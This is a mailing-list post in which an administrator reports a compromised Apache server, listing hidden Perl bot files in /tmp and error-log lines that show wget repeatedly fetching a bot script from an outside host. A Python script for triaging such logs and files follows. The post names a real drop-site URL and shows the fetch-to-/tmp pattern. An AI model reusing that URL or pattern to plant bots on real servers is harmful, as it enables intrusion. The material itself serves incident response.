Here's what I found out with more digging in the logs.
There are 3 hidden files (attached to this message) in /tmp/:
1) .fuhrer
2) .fuhrer2
3) .fuhrer3
ns1:/var/log/apache2# ls -la /tmp/
total 56
drwxrwxrwt 5 root root 4096 Nov 25 07:46 .
drwxr-xr-x 26 root root 4096 Nov 25 04:49 ..
drwxrwxrwt 2 root root 4096 Nov 21 23:32 .ICE-unix
drwxrwxrwt 2 root root 4096 Nov 21 23:32 .X11-unix
-rw-r--r-- 1 www-data www-data 3673 Nov 25 00:30 .fuhrer
-rw-r--r-- 1 www-data www-data 18698 Nov 25 06:11 .fuhrer2
-rw-r--r-- 1 www-data www-data 0 Nov 25 08:10 .fuhrer3
-rw------- 1 www-data www-data 71 Nov 23 03:28 sess_07f541a848d0dd70fc87c3aed1691c87
-rw------- 1 www-data www-data 864 Nov 23 01:55 sess_8092654d49176bb860dca7fad5f50cce
-rw------- 1 www-data www-data 342 Nov 22 23:56 sess_e5e56ebacf7fcd31ea42d829e1f1f4fd
drwxrwxrwx 3 www-data www-data 4096 Nov 23 01:28 yappa-ng_cache
All three are Perl scripts, so now it is clear that these are the Perl
scripts which are running from within Apache (I've enabled mod_perl in my
Apache installation) and eating up the CPU cycles.
Now let's look a little at /var/log/apache2/error.log:
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]
0K .......... ........ 100% 210.37 KB/s
08:07:40 (210.37 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]
--08:07:40-- http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
           => `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]
0K .......... ........ 100% 211.06 KB/s
08:07:40 (211.06 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]
--08:07:40-- http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
           => `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]
0K .......... ........ 100% 210.52 KB/s
The logs show that the guy uploaded the files to /tmp and hid them.
In my first mail, the logs showed a lot of "sh" defunct processes executed
from within Apache. Is this an attempt to gain a shell through the web
server?
Please suggest what more I should look for and how to tackle this attack.
Regards,
rrs
--
Ritesh Raj Sarraf
RESEARCHUT -- http://www.researchut.com
Gnupg Key ID: 04F130BC
"Stealing logic from one person is plagiarism, stealing from many is
research."
"Necessity is the mother of invention."
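One way to triage evidence of this shape (an added example, not code from the original thread): a small Python script that pulls the wget fetch records out of an Apache error log, flags dot-files in /tmp that are regular files owned by the web-server account, and ties each flagged file to the download that wrote it by path and byte count. The log lines, file names and drop-site URL below are constructed to mirror the formats in the post, not the real values.

```python
import os
import re

WEB_USER = "www-data"   # account the web server runs as
WATCH_DIR = "/tmp"      # world-writable directory the post looked in
# Shapes of the wget transcript lines that showed up in error.log.
FETCH_RE = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")
SAVED_RE = re.compile(r"^\S+ \(.*?\) - `([^']+)' saved \[(\d+)/\d+\]")
# One `ls -la` row: mode, links, owner, group, size, mtime, name.
LS_RE = re.compile(r"^([-dl][rwxstT-]{9})\s+\d+\s+(\S+)\s+\S+\s+(\d+)\s+\w{3}\s+\d+\s+[\d:]+\s+(.+)$")

def wget_downloads(log_lines):
    """(url, destination, bytes) for each completed fetch in the log."""
    hits, url = [], None
    for line in log_lines:
        if m := FETCH_RE.match(line):
            url = m.group(1)           # remember the URL until its 'saved' line
        elif (m := SAVED_RE.match(line)) and url:
            hits.append((url, m.group(1), int(m.group(2))))
            url = None
    return hits

def hidden_web_user_files(ls_lines, owner=WEB_USER):
    """Dot-files that are regular files owned by the web-server account."""
    flagged = []
    for line in ls_lines:
        if m := LS_RE.match(line):
            mode, user, size, name = m.groups()
            if mode[0] == "-" and user == owner and name.startswith("."):
                flagged.append((name, int(size)))
    return flagged

def correlate(downloads, flagged, watch_dir=WATCH_DIR):
    """Tie each flagged file to the fetch that wrote it (same path, same byte count)."""
    on_disk = dict(flagged)
    return [(os.path.basename(dest), url) for url, dest, size in downloads
            if os.path.dirname(dest) == watch_dir
            and on_disk.get(os.path.basename(dest)) == size]

# Constructed samples mirroring the post's log and listing (not the real values).
SAMPLE_ERROR_LOG = """\
--08:07:40--  http://dropsite.example/~someone/bot.txt
HTTP request sent, awaiting response... 200 OK
08:07:40 (210.37 KB/s) - `/tmp/.hidden2' saved [18698/18698]
""".splitlines()
SAMPLE_LS = """\
-rw-r--r-- 1 www-data www-data 3673 Nov 25 00:30 .hidden
-rw-r--r-- 1 www-data www-data 18698 Nov 25 06:11 .hidden2
-rw------- 1 www-data www-data 864 Nov 23 01:55 sess_8092654d49176bb860dca7fad5f50cce
""".splitlines()
```

Feed it the real error.log and `ls -la /tmp/` output and every hit is a file you can hash and compare against the download source before deciding how far the compromise goes.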
_______________________________________________
linux-india-help mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/linux-india-help